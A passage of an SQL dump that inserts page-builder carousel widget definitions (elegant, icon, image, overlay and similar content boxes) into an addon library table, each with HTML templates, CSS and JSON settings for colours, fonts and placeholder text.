Border","name":"btn_border_color","description":"","default_value":"#656d75"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Droid+Serif:400i,700i","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans","condition":""},{"url":"uc_dark_carousel_content\\/uc_dark_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(28, 'Elegant Content', 'uc_elegant_carousel_content_vc', 'uc_elegant_carousel_content', 'vc', '', 28, '{"html":"<div class=\\"uc_elegant_content\\">\\n            <div class=\\"uc_elegant_content_container_holder\\">\\n                <div class=\\"uc_elegant_content_placeholder\\" style=\\"background:{{bg_color}};\\">\\n                    <img src=\\"{{image}}\\" alt=\\"\\">\\n                <\\/div>\\n                \\n\\t\\t\\t\\t<div class=\\"uc_elegant_content_content\\" style=\\"border-color:{{primary_color}};\\">\\n                \\t<div class=\\"uc_elegant_content_box\\">\\n                        <h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n                        <div class=\\"uc_paragraph\\" style=\\"color:{{primary_color}};\\">\\n                        \\t{{content|raw}}\\n                        <\\/div>\\n                        <div class=\\"uc_more_btn\\" style=\\" border-color:{{primary_color}};\\">\\n                        \\t<a class=\\"uc_more_btn\\" style=\\"background:{{primary_color}}; color:#0e0e0e;\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n                        <\\/div>\\n                    <\\/div>\\n                <\\/div>\\n            <\\/div>\\t\\n   <\\/div>","css":"@media only screen and (min-width: 768) and (max-width: 980px) {\\n.uc_elegant_content .uc_elegant_content_container_holder .uc_elegant_content_content .uc_elegant_content_box h2{font-size: 25px;margin: 15px 0;}\\n.uc_elegant_content .uc_elegant_content_container_holder .uc_elegant_content_content .uc_elegant_content_box .uc_paragraph{line-height: 20px;font-size: 14px;margin-bottom: 9px;}\\t\\n.uc_elegant_content .uc_elegant_content_container_holder .uc_elegant_content_content .uc_elegant_content_box .uc_more_btn a{padding: 5px 30px;}\\n.uc_elegant_content .uc_elegant_content_container_holder .uc_elegant_content_content{width: 91%;height: 95%;padding: 5px 8px;}\\n.uc_elegant_content .uc_elegant_content_container_holder:hover .uc_elegant_content_content .uc_elegant_content_box{bottom: 5%;}\\n}"}', '{"options":{"enable_items":"false","path_assets":"uc_elegant_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"true"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#1d2d3a"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/uc_elegant_carousel_img1.jpg"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#ffffff"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incid idunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco.","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Read More","font_editable":"true"},{"type":"uc_colorpicker","title":"Button Color","name":"btn_color","description":"","default_value":"#0e0e0e"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"uc_elegant_carousel_content\\/uc_elegant_content.css","condition":""},{"url":"uc_elegant_carousel_content\\/uc_elegant_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(29, 'Elegant Content', 'uc_elegant_carousel_content_box_vc', 'uc_elegant_carousel_content_box', 'vc', '', 29, '{"html":"<div class=\\"uc_elegant_content\\">\\n  <div class=\\"uc_elegant_content_container_holder\\" style=\\"background-color:{{bg_color}};\\">\\n\\n    <div class=\\"uc_elegant_content_placeholder\\">\\n      <img src=\\"{{image}}\\" alt=\\"\\">\\n    <\\/div>\\n    <div class=\\"uc_elegant_content_content_box\\">\\n      <h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n      <p style=\\"color:{{content_color}}; border-left:{{primary_color}} 4px solid; margin:0 0px 5px -21px; padding-left:19px;\\" >{{content|raw}}<\\/p>\\n      <a class=\\"uc_more_btn\\" style=\\"color:{{primary_color}};  background-color:{{bg_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n    <\\/div>\\n  <\\/div>\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_elegant_carousel_content_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#ffffff"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/1uc_elegant_carousel_img2.jpg"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#181818"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incididunt ut...","font_editable":"true"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#8a8a8a"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Show More","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"uc_elegant_carousel_content_box\\/uc_elegant_content.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Droid+Serif:400i,700i","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(30, 'Icon Box Content', 'uc_icon_box_carousel_content_vc', 'uc_icon_box_carousel_content', 'vc', '', 30, '{"html":"<div class=\\"uc_icon_box_content\\">\\n      \\n    <div class=\\"uc_auto_box\\">\\n        <div class=\\"uc_rowslider_content\\">\\n            <div class=\\"uc_iconboxs\\" id=\\"uc_testimonials\\">\\n               <div class=\\"uc_boxs_icon\\">\\n                  <div class=\\"uc_icon uc_get_start\\" style=\\"background-color:{{icon_bg}};\\"> \\n                    <i class=\\"{{icon}}\\" aria-hidden=\\"true\\"><\\/i> \\n                  <\\/div>\\n                  <h4 class=\\"uc_tittle_box\\" style=\\"color:{{title_color}};\\">{{title|raw}}<\\/h4>\\n                  <p class=\\"uc_des_box\\"  style=\\"color:{{content_color}};\\">{{content|raw}}<\\/p>\\n                  <a href=\\"{{link}}\\" class=\\"uc_more\\" style=\\"color:{{btn_color}};\\">{{btn_text|raw}}<\\/a>  \\n                <\\/div>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>\\n    \\n<\\/div>","css":".uc_icon_box_content .uc_auto_box .uc_rowslider_content .uc_iconboxs .uc_boxs_icon:hover .uc_tittle_box{color:#fff !important;}"}', '{"options":{"enable_items":"false","path_assets":"uc_icon_box_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Column Size","preview_size":"column","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Title","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consecte. ipsum dolor sit amet, consecte.","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Show More","font_editable":"true"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-heart"},{"type":"uc_colorpicker","title":"Icon Background","name":"icon_bg","description":"","default_value":"#7144ed"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#233145"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#5a7182"},{"type":"uc_colorpicker","title":"Button Color","name":"btn_color","description":"","default_value":"#3498db"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"uc_icon_box_carousel_content\\/uc_icon_box_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(31, 'Icon Content', 'uc_icon_carousel_content_vc', 'uc_icon_carousel_content', 'vc', '', 31, '{"html":"<div class=\\"uc_icon_content\\">\\n  <div class=\\"uc_icon_content_container_holder\\" style=\\"background-color:{{bg_color}};\\">\\n    <div class=\\"uc_icon_content_content\\">\\n      <i style=\\"color:{{icon_color}};\\" class=\\"{{icon}}\\"><\\/i>\\n      <h2 style=\\"color:{{title_color}};\\">{{title|raw}}<\\/h2>\\n      <span class=\\"title_border\\" style=\\"background-color:{{title_border}};\\"><\\/span>\\n      <p style=\\"color:{{content_color}};\\" >{{content|raw}}<\\/p>\\n      <a class=\\"uc_more_btn\\" style=\\"color:{{btn_color}};  background-color:{{bg_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n    <\\/div>\\n  <\\/div>\\n<\\/div>","css":".uc_icon_content .uc_icon_content_content i {font-size: 50px !important; margin-bottom: 40px;}\\n.uc_icon_content .uc_icon_content_content p{ margin-bottom: 18px;}\\n.uc_icon_content .uc_icon_content_container_holder{box-shadow: inherit;}"}', '{"options":{"enable_items":"false","path_assets":"uc_icon_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title ","name":"title","description":"","admin_label":"true","default_value":"Default title GOES HERE","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#ffffff"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-clock-o"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#181818"},{"type":"uc_colorpicker","title":"Title Border","name":"title_border","description":"","default_value":"#b2b5be"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incididunt ut...","font_editable":"true"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#b2b5be"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Show More","font_editable":"true"},{"type":"uc_colorpicker","title":"Button Text Color","name":"btn_color","description":"","default_value":"#b2b5be"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"},{"type":"uc_colorpicker","title":"Icon Color","name":"icon_color","description":"","default_value":"#b2b5be"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"uc_icon_carousel_content\\/uc_icon_content_content.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Oswald","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(32, 'Image Content', 'uc_image_carousel_content_vc', 'uc_image_carousel_content', 'vc', '', 32, '{"html":"<div class=\\"uc_image_content\\">\\n            <div class=\\"uc_image_content_container_holder\\">\\n                <div class=\\"uc_image_content_placeholder\\">\\n                    <img src=\\"{{image}}\\" alt=\\"\\">\\n                <\\/div>\\n                <div class=\\"uc_image_content_content\\" style=\\"background:{{bg_color}};\\">\\n                    <h2 style=\\"color:{{title_color}};\\">{{title|raw}}<\\/h2>\\n                    <div class=\\"uc_paragraph\\" style=\\"color:{{content_color}};\\">{{content|raw}}<\\/div>\\n                    <a class=\\"uc_more_btn\\" style=\\"color:{{btn_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n                <\\/div>\\n            <\\/div>\\n   <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_image_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/img3.jpg"},{"type":"uc_colorpicker","title":"Backgrounf  Color","name":"bg_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"false","default_value":"Default Title","font_editable":"true"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#343434"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, con","font_editable":"true"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#838383"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Learn More","font_editable":"true"},{"type":"uc_colorpicker","title":"Button Text Color","name":"btn_color","description":"","default_value":"#326cff"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:300,400,600,700","condition":""},{"url":"uc_image_carousel_content\\/uc_image_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(33, 'Image Content', 'uc_image_carousel_content_box_vc', 'uc_image_carousel_content_box', 'vc', '', 33, '{"html":"<div class=\\"uc_image_content\\">\\n    \\t<div class=\\"uc_image_content_container_holder\\" style=\\"background-color:{{bg_color}};\\">\\n        \\t<div class=\\"uc_image_content_placeholder\\">\\n        \\t\\t<img src=\\"{{image}}\\" alt=\\"\\">\\n            <\\/div>\\n            <div class=\\"uc_image_content_box_content\\" style=\\"background-color:{{bg_color}};\\">\\n                <h2 style=\\"color:{{title_color}};\\">{{title|raw}}<\\/h2>\\n                <p style=\\"color:{{content_color}};\\">{{content|raw}} <\\/p>\\n                <a class=\\"uc_more_btn\\" style=\\"color:{{btn_color}}; \\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n            <\\/div>\\n        <\\/div>\\n   <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_image_carousel_content_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title goes here","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#ffffff"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/uc_image_carousel_img1.jpg"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#181818"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipisi cing elit, sed do eius mod tempor incididunt ut \\nlabore et dolore magna aliqua. ","font_editable":"true"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#8a8a8a"},{"type":"uc_textfield","title":"Button text","name":"btn_text","description":"","admin_label":"false","default_value":"Show More","font_editable":"true"},{"type":"uc_colorpicker","title":"Button Color","name":"btn_color","description":"","default_value":"#000"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Droid+Serif:400,400i","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:900","condition":""},{"url":"uc_image_carousel_content_box\\/uc_image_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(34, 'Image Link Content', 'uc_image_link_carousel_content_vc', 'uc_image_link_carousel_content', 'vc', '', 34, '{"html":"<div class=\\"uc_image_link_content\\">\\n    \\t<div class=\\"uc_image_link_content_container_holder\\" style=\\"background-color:{{bg_color}};\\">\\n          \\n        \\t<div class=\\"uc_image_link_content_placeholder\\">\\n        \\t\\t<img src=\\"{{image}}\\" alt=\\"\\">\\n                <span><a href=\\"{{link}}\\" style=\\"background-color:{{btn_bg_color}}; color:{{bg_color}}; text-decoration:none;\\" class=\\"uc_title_text\\">{{btn_text|raw}}<\\/a><\\/span>\\n            <\\/div>\\n            <div class=\\"uc_image_link_content_content\\">\\n                <h2 style=\\"color:{{title_color}};\\">{{title|raw}}<\\/h2>\\n                <p style=\\"color:{{content_color}};\\" >{{content|raw}}<\\/p>\\n                \\n            <\\/div>\\n        <\\/div>\\n   <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_image_link_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Column Size","preview_size":"column","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#ffffff"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/uc_image_link_carousel_img1.jpg"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Learn More","font_editable":"true"},{"type":"uc_colorpicker","title":"Button Background Color","name":"btn_bg_color","description":"","default_value":"#000000"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#181818"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incididunt ut.labore et dolore... ","font_editable":"true"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#8a8a8a"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Droid+Serif:400i,700i","condition":""},{"url":"uc_image_link_carousel_content\\/uc_image_link_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(35, 'Material Content', 'uc_material_carousel_content_vc', 'uc_material_carousel_content', 'vc', '', 35, '{"html":"<div class=\\"uc_icon_content\\">\\n  <div class=\\"uc_icon_content_container_holder\\" style=\\"background-color:{{bg_color}};\\">\\n    <div style=\\"background-color:{{icon_bg_color}}\\" class=\\"uc_icon_content_top\\">\\n      <span><i style=\\"color:{{icon_color}};\\" class=\\"{{icon}}\\"><\\/i><\\/span>\\n    <\\/div>\\t\\n    <div class=\\"uc_icon_content_content\\">\\n      <h2 style=\\"color:{{title_color}};\\">{{title|raw}}<\\/h2>\\n      <p style=\\"color:{{content_color}};\\" >{{content|raw}}<\\/p>\\n    <\\/div>\\n  <\\/div>\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_material_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"true"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incididunt ut...","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Icon Background Color","name":"icon_bg_color","description":"","default_value":"#00d3ca"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-clock-o"},{"type":"uc_colorpicker","title":"Icon Color","name":"icon_color","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#181818"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#b2b5be"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"uc_material_carousel_content\\/uc_icon_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(36, 'Offset Carousel Content', 'uc_offset_carousel_content_vc', 'uc_offset_carousel_content', 'vc', '', 36, '{"html":"<div class=\\"uc_offset_content\\">\\n  <div class=\\"uc_offset_content_container_holder\\">\\n    <div class=\\"uc_offset_content_placeholder\\">\\n      <img src=\\"{{image}}\\" alt=\\"\\">\\n    <\\/div>                \\n    <div class=\\"uc_offset_content_content\\" style=\\"border-color:#e2cf75 ;\\">\\n      <div class=\\"uc_offset_content_box\\">\\n        <div class=\\"uc_offset_content_box_inner\\">\\n          <h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n          <span class=\\"uc_offset_border\\" style=\\"background-color:{{primary_color}};\\"><\\/span>\\n          <div class=\\"uc_paragraph\\" style=\\"color:{{primary_color}};\\">{{content|raw}} <\\/div>\\n          <div class=\\"uc_more_btn\\" style=\\" border-color:{{primary_color}};\\">\\n            <a class=\\"uc_more_btn\\" style=\\" color:{{primary_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n          <\\/div>\\n        <\\/div>\\n      <\\/div>\\n    <\\/div>\\n  <\\/div>\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_offset_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/uc_offset_carousel_img2.jpg"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#ffffff"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipisi cing elit, sed do eius mod tempor incididunt ut ","font_editable":"true"},{"type":"uc_textfield","title":"Button text","name":"btn_text","description":"","admin_label":"false","default_value":"Learn more","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,600","condition":""},{"url":"uc_offset_carousel_content\\/uc_offset_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(37, 'Overlap Content', 'uc_overlap_carousel_content_vc', 'uc_overlap_carousel_content', 'vc', '', 37, '{"html":"<div class=\\"uc_overlap_content\\">\\n  <div class=\\"uc_overlap_content_container_holder\\" style=\\"background-color:{{primary_color}};\\">\\n    <div class=\\"uc_figar_box\\">\\n      <img src=\\"{{image}}\\" alt=\\"\\">\\n    <\\/div>\\n    <div class=\\"uc_overlap_content_content\\" style=\\"background-color:{{primary_color}};\\">\\n      <div class=\\"uc_overlap_content_box\\" style=\\"background-color:{{primary_color}};\\">\\n        <h2 style=\\"color:{{title_color}};\\">{{title|raw}}<\\/h2>\\n\\n        <p style=\\"color:{{content_color}};\\" >{{content|raw}}<\\/p>\\n        <a class=\\"uc_more_btn\\" style=\\"color:{{btn_text_color}}; border-color:{{btn_border}};  background-color:{{primary_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n      <\\/div>\\n    <\\/div>\\n  <\\/div>        \\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_overlap_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incididunt ut...","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Show More","font_editable":"true"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#ffffff"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/uc_overlap_carousel_img3.jpg"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#181818"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#838383"},{"type":"uc_colorpicker","title":"Button border","name":"btn_border","description":"","default_value":"#326cff"},{"type":"uc_colorpicker","title":"Button Text Color","name":"btn_text_color","description":"","default_value":"#326cff"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,600,700","condition":""},{"url":"uc_overlap_carousel_content\\/uc_overlap_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(38, 'Overlay Content', 'uc_overlay_carousel_content_vc', 'uc_overlay_carousel_content', 'vc', '', 38, '{"html":"<div class=\\"uc_overlay_content\\">\\n            <div class=\\"uc_overlay_content_container_holder\\">\\n                <div class=\\"uc_overlay_content_placeholder\\">\\n                    <img src=\\"{{image}}\\" alt=\\"\\">\\n                <\\/div>\\n                <div class=\\"uc_overlay_content_content\\">\\n                \\t<h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n                    <div class=\\"uc_content_box\\">\\n                        <div class=\\"uc_paragraph\\" style=\\"color:{{primary_color}};\\">{{content|raw}}<\\/div>\\n                        <a class=\\"uc_more_btn\\" style=\\"color:{{primary_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n                    <\\/div>\\n                <\\/div>\\n            <\\/div>            \\n   <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_overlay-carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/img1.jpg"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Title ","name":"title","description":"","admin_label":"false","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, con sectetur adipisi cing elit, sed do eius mod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam... ","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Learn More","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"uc_overlay-carousel_content\\/uc_overlay-carousel_content.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:300,400,600,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL);
INSERT INTO `cyb_addonlibrary_addons` (`id`, `title`, `name`, `alias`, `addontype`, `description`, `ordering`, `templates`, `config`, `catid`, `is_active`, `test_slot1`, `test_slot2`, `test_slot3`) VALUES
